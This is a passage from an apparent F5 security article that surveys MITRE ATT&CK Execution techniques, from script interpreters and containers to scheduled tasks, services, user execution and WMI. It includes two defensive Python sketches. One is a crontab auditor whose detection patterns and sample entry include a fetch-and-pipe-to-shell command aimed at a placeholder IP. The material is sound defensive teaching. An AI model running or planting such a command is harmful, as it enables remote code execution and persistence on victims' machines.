JavaScript (JS) is a platform-independent scripting language, commonly used in web pages and runtime environments. Microsoft's JScript and JavaScript for Automation (JXA) on macOS are based on JS. Adversaries exploit JS to execute malicious scripts, often through Drive-by Compromise or by downloading scripts as secondary payloads. Since JS is text-based, it is often obfuscated to evade detection.
Example - XSS

(.008) Network Device CLI:
Network devices often provide a CLI or scripting interpreter accessible via direct console connection or remotely through telnet or SSH. These interfaces allow interaction with the device for various functions. Adversaries may exploit them to alter device behavior, manipulate traffic, load malicious software by modifying configurations, or disable security features and logging to avoid detection.
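The interpreter subsections above note that script payloads, JavaScript in particular, are often obfuscated or encoded to evade detection. One simple triage heuristic defenders use is character entropy: packed or base64-encoded payloads score noticeably higher than hand-written scripts. The Python sketch below is a toy illustration of that heuristic; the sample strings are harmless and the approach is illustrative, not a production detector.

```python
import math
from collections import Counter

def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; higher suggests packed or encoded data."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# Hand-written script text vs. a base64-style blob (both harmless strings):
plain = "function add(a, b) { return a + b; }"
encoded = "aHR0cDovL2V4YW1wbGUuY29tL3BheWxvYWQuYmluP2lkPTQyJmtleT1YWVo="
print(f"plain:   {shannon_entropy(plain):.2f} bits/char")
print(f"encoded: {shannon_entropy(encoded):.2f} bits/char")
```

Entropy alone produces false positives (legitimate minified or compressed content also scores high), so in practice it is combined with context such as the process that wrote the script and where it came from.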
(.009) Cloud API:
Cloud APIs offer programmatic access to nearly all aspects of a tenant, available through methods like CLIs, in-browser Cloud Shells, PowerShell modules (e.g., Azure for PowerShell), or SDKs for languages like Python. These APIs provide administrative access to major services. Malicious actors with valid credentials, often stolen, can exploit these APIs to perform malicious actions.

(.010) AutoHotKey & AutoIT:
AutoIT and AutoHotkey (AHK) are scripting languages used to automate Windows tasks, such as clicking buttons, entering text, and managing programs. Attackers may exploit AHK (.ahk) and AutoIT (.au3) scripts to execute malicious code, like payloads or keyloggers. These scripts can also be embedded in phishing payloads or compiled into standalone executable files.

(.011) Lua:
Lua is a cross-platform scripting and programming language, primarily designed for embedding in applications. It can be executed via the command line using the standalone Lua interpreter, through scripts (.lua), or within Lua-embedded programs. Adversaries may exploit Lua scripts for malicious purposes, such as abusing or replacing existing Lua interpreters to execute harmful commands at runtime. Malware examples developed using Lua include EvilBunny, Line Runner, PoetRAT, and Remsec.

(.012) Hypervisor CLI:
Hypervisor CLIs offer extensive functionality for managing both the hypervisor and its hosted virtual machines. On ESXi systems, tools like “esxcli” and “vim-cmd” allow administrators to configure and perform various actions. Attackers may exploit these tools to enable actions like File and Directory Discovery or Data Encrypted for Impact. Malware such as Cheerscrypt and Royal ransomware have leveraged this technique.

3. T1609: Container Administration Command

Adversaries may exploit container administration services, like the Docker daemon, Kubernetes API server, or kubelet, to execute commands within containers.
In Docker, attackers can specify an entry point to run a script or use docker exec to execute commands in a running container. In Kubernetes, with sufficient permissions, adversaries can gain remote execution by interacting with the API server or kubelet, or by using commands like kubectl exec within the cluster.

4. T1610: Deploy Container

Containers can be exploited by attackers to run malicious code or bypass security measures, often through the use of harmful processes or weak settings, such as missing network rules or user restrictions. In Kubernetes environments, attackers may deploy containers with elevated privileges or vulnerabilities to access other containers or the host node. They may also use compromised or seemingly benign images that later download malicious payloads.

5. T1675: ESXi Administration Command

ESXi administration services can be exploited to execute commands on guest machines within an ESXi virtual environment. ESXi-hosted VMs can be remotely managed via persistent background services, such as the VMware Tools Daemon Service. Adversaries can perform malicious activities on VMs by executing commands through SDKs and APIs, enabling follow-on behaviors like File and Directory Discovery, Data from Local System, or OS Credential Dumping.

6. T1203: Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute malicious code. These exploits can target browsers, office applications, or common third-party software. By exploiting specific vulnerabilities, attackers can achieve arbitrary code execution. The most valuable exploits in an offensive toolkit are often those that enable remote code execution, as they provide a pathway to gain access to the target system.
Example: Remote Code Execution

7. T1674: Input Injection

Input Injection involves adversaries simulating keystrokes on a victim’s computer to carry out actions on their behalf.
This can be achieved through several methods, such as emulating keystrokes to execute commands or scripts, or using malicious USB devices to inject keystrokes that trigger scripts or commands. For example, attackers have employed malicious USB devices to simulate keystrokes that launch PowerShell, enabling the download and execution of malware from attacker-controlled servers.

8. T1559: Inter-Process Communication

Inter-Process Communication (IPC) is commonly used by processes to share data, exchange messages, or synchronize execution. It also helps prevent issues like deadlocks. However, IPC mechanisms can be abused by adversaries to execute arbitrary code or commands. The implementation of IPC varies across operating systems. Additionally, command and scripting interpreters may leverage underlying IPC mechanisms, and adversaries might exploit remote services, such as the Distributed Component Object Model (DCOM), to enable remote IPC-based execution.

(.001) Component Object Model (Windows):
Component Object Model (COM) is an inter-process communication (IPC) mechanism in the Windows API that allows interaction between software objects. A client object can invoke methods on server objects via COM interfaces. Languages like C, C++, Java, and Visual Basic can be used to exploit COM interfaces for arbitrary code execution. Certain COM objects also support functions such as creating scheduled tasks, enabling fileless execution, and facilitating privilege escalation or persistence.

(.002) Dynamic Data Exchange (Windows):
Dynamic Data Exchange (DDE) is a client-server protocol used for one-time or continuous inter-process communication (IPC) between applications. Adversaries can exploit DDE in Microsoft Office documents, either directly or via embedded files, to execute commands without using macros. Similarly, DDE formulas in CSV files can trigger unintended operations.
This technique may also be leveraged by adversaries on compromised systems where direct access to command or scripting interpreters is restricted.

(.003) XPC Services (macOS):
macOS uses XPC services for inter-process communication, such as between the XPC Service daemon and privileged helper tools in third-party apps. Applications define the communication protocol used with these services. Adversaries can exploit XPC services to execute malicious code, especially if the app’s XPC handler lacks proper client validation or input sanitization, potentially leading to privilege escalation.

9. T1106: Native API

Native APIs provide controlled access to low-level kernel services, including those related to hardware, memory management, and process control. These APIs are used by the operating system during system boot and for routine operations. However, adversaries may abuse native API functions to carry out malicious actions. By invoking system calls directly or indirectly through assembly, attackers can bypass user-mode security measures such as API hooks. Attackers may also tamper with defensive tools that monitor API use, for example by unhooking functions or altering sensor behavior. Many well-known exploit tools and malware families, such as Cobalt Strike, Emotet, Lazarus Group, LockBit 3.0, and Stuxnet, have leveraged Native API techniques to bypass security mechanisms, evade detection, and execute low-level malicious operations.

10. T1053: Scheduled Task/Job

This technique involves adversaries abusing task scheduling features to execute malicious code at specific times or intervals. Task schedulers are available across major operating systems, including Windows, Linux, macOS, and containerized environments, and can also be used to schedule tasks on remote systems. Adversaries commonly use scheduled tasks for persistence, privilege escalation, and to run malicious payloads under the guise of trusted system processes.
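To make the defensive angle concrete, the Python sketch below audits crontab-style text for a fetch-and-execute shape commonly seen in scheduled-task persistence. The regex list and the sample entries are illustrative assumptions, not a complete detection rule; a real audit would also cover at jobs, systemd timers, and encoded commands.

```python
import re

# Illustrative patterns for cron entries that download and run remote
# content -- a common scheduled-task persistence shape. Deliberately
# incomplete: real detections cover far more cases.
SUSPICIOUS = [re.compile(p) for p in (r"curl\s+http", r"wget\s+http", r"\|\s*(ba)?sh\b")]

def audit_cron_text(text: str) -> list[str]:
    """Return crontab lines that match any suspicious pattern."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip comments and blank lines
        if any(p.search(line) for p in SUSPICIOUS):
            hits.append(line)
    return hits

# Audit an in-memory sample instead of reading /etc/crontab directly:
sample = (
    "0 3 * * * root curl http://203.0.113.5/x | sh\n"
    "30 2 * * * root /usr/bin/backup --daily\n"
)
print(audit_cron_text(sample))  # -> only the fetch-and-execute entry
```

The same pattern-matching approach extends to the other schedulers discussed below by swapping in the relevant file locations and command syntax.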
(.002) At:
The “At” utility is available on Windows, Linux, and macOS for scheduling tasks to run at specific times. Adversaries can exploit “At” to execute programs at system startup or on a set schedule, helping them maintain persistence. It can also be misused for remote execution during lateral movement or to run processes under the context of a specific user account. In Linux environments, attackers may use “At” to break out of restricted environments, aiding in privilege escalation.

(.003) Cron:
The “cron” utility is a time-based job scheduler used in Unix-like operating systems. The “crontab” file contains scheduled tasks and the times at which they should run. These files are stored in system-specific file paths. Adversaries can exploit “cron” in Linux or Unix environments to execute programs at startup or on a set schedule, maintaining persistence. In ESXi environments, “cron” jobs must be created directly through the “crontab” file.

(.005) Scheduled Task:
Adversaries can misuse the Windows Task Scheduler to run programs at startup or on a schedule, ensuring persistence. It can also be exploited for remote execution during lateral movement or to run processes under specific accounts (e.g., SYSTEM). Similar to System Binary Proxy Execution, attackers may hide one-time executions under trusted system processes. They can also create "hidden" tasks that are not visible to defender tools or manual queries. Additionally, attackers may alter registry metadata to further conceal these tasks.

(.006) Systemd Timers:
Systemd timers are files with a .timer extension used to control services in Linux, serving as an alternative to Cron. They can be activated remotely via the systemctl command over SSH. Each .timer file requires a corresponding .service file. Adversaries can exploit systemd timers to run malicious code at startup or on a schedule for persistence.
Timers placed in privileged paths can maintain root-level persistence, while user-level timers can provide user-level persistence.

(.007) Container Orchestration Job:
Container orchestration jobs automate tasks at specific times, similar to cron jobs on Linux. These jobs can be configured to maintain a set number of containers, helping persist within a cluster. In Kubernetes, a CronJob schedules a Job that runs containers to perform tasks. Adversaries can exploit CronJobs to deploy Jobs that execute malicious code across multiple nodes in a cluster.

11. T1648: Serverless Execution

Cloud providers offer various serverless resources, such as compute functions, integration services, and web-based triggers, that adversaries can exploit to execute arbitrary commands, hijack resources, or deploy functions for further compromise. Cloud events can also trigger these serverless functions, potentially enabling persistent and stealthy execution over time. An example of this is Pacu, a well-known open-source AWS exploitation framework, which leverages serverless execution techniques.

12. T1229: Shared Modules

Shared modules are executable components loaded into processes to provide access to reusable code, such as custom functions or Native API calls. Adversaries can abuse this mechanism to execute arbitrary payloads by modularizing their malware into shared objects that perform various malicious functions. On Linux and macOS, the module loader can load shared objects from any local path. On Windows, the loader can load DLLs from both local paths and Universal Naming Convention (UNC) network paths.

13. T1072: Software Deployment Tools

Adversaries may exploit centralized management tools to execute commands and move laterally across enterprise networks. Access to endpoint or configuration management platforms can enable remote code execution, data collection, or destructive actions like wiping systems.
SaaS-based configuration management tools can also extend this control to cloud-hosted instances and on-premises systems. Similarly, configuration tools used in network infrastructure devices may be abused in the same way. The level of access required for such activity depends on the system’s configuration and security posture.

14. T1569: System Services

System services and daemons can be abused to execute malicious commands or programs, whether locally or remotely. Creating or modifying services allows execution of payloads for persistence, particularly if set to run at startup, or for temporary, one-time actions.

(.001) Launchctl (macOS):
launchctl interacts with launchd, the service management framework for macOS. It supports running subcommands via the command line, interactively, or from standard input. Adversaries can use launchctl to execute commands and programs as Launch Agents or Launch Daemons, either through scripts or manual commands.

(.002) Service Execution (Windows):
The Windows Service Control Manager (services.exe) manages services and is accessible through both the GUI and system utilities. Tools like PsExec and sc.exe can be used for remote execution by specifying remote servers. Adversaries may exploit these tools to execute malicious content by starting new or modified services. This technique is often used for persistence or privilege escalation.

(.003) Systemctl (Linux):
systemctl is the main interface for systemd, the Linux init system and service manager. It is typically used from a shell but can also be integrated into scripts or applications. Adversaries may exploit systemctl to execute commands or programs as systemd services.

15. T1204: User Execution

Users may be tricked into running malicious code by opening a harmful file or link, often through social engineering. While this usually happens right after initial access, it can occur at other stages of an attack.
Adversaries might also deceive users into enabling remote access tools, running malicious scripts, or manually downloading and executing malware. Tech support scams often use phishing, vishing, and fake websites, with scammers spoofing numbers or setting up fake call centers to steal access or install malware.

(.001) Malicious Link:
Users may be tricked into clicking on a link that triggers code execution. This could also involve exploiting a browser or application vulnerability (Exploitation for Client Execution). Additionally, links might lead users to download files that, when executed, deliver malware.

(.002) Malicious File:
Users may be tricked into opening a file that leads to code execution. Adversaries often use techniques like masquerading and obfuscating files to make them appear legitimate, increasing the chances that users will open and execute the malicious file.

(.003) Malicious Image:
Cloud images from platforms like AWS, GCP, and Azure, as well as images for popular container runtimes like Docker, can be backdoored. These compromised images may be uploaded to public repositories, and users might unknowingly download and deploy an instance or container, bypassing Initial Access defenses. Adversaries may also use misleading names to increase the chances of users mistakenly deploying the malicious image.

(.004) Malicious Copy and Paste:
Users may be deceived into copying and pasting malicious code into a Command or Scripting Interpreter. Malicious websites might display fake error messages or CAPTCHA prompts, instructing users to open a terminal or the Windows Run dialog and run arbitrary, often obfuscated commands. Once executed, the adversary can gain access to the victim's machine. Phishing emails may also be used to trick users into performing this action.

16. T1047: Windows Management Instrumentation

WMI (Windows Management Instrumentation) is a tool designed for programmers, providing a standardized way to manage and access data on Windows systems.
It serves as an administrative feature that allows interaction with system components. Adversaries can exploit WMI to interact with both local and remote systems, using it to perform actions such as gathering information for discovery or executing commands and payloads.

How can F5 help?

F5 security solutions such as WAF (Web Application Firewall), API security, and DDoS mitigation protect applications and APIs across platforms, including cloud, edge, on-premises, and hybrid environments, thereby reducing security risks. F5 bot and risk management solutions can also stop malicious bots and automation, making your modern applications safer. The example attacks mentioned under the techniques above can be effectively mitigated by F5 products such as Distributed Cloud, BIG-IP, and NGINX. Here are a few links which explain the mitigation steps:

Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF
Mitigating Struts2 RCE using F5 BIG-IP

For more details on the other mitigation techniques of MITRE ATT&CK Execution Tactic TA0002, please reach out to your local F5 team.

Reference Links:

MITRE ATT&CK® Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK®
MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs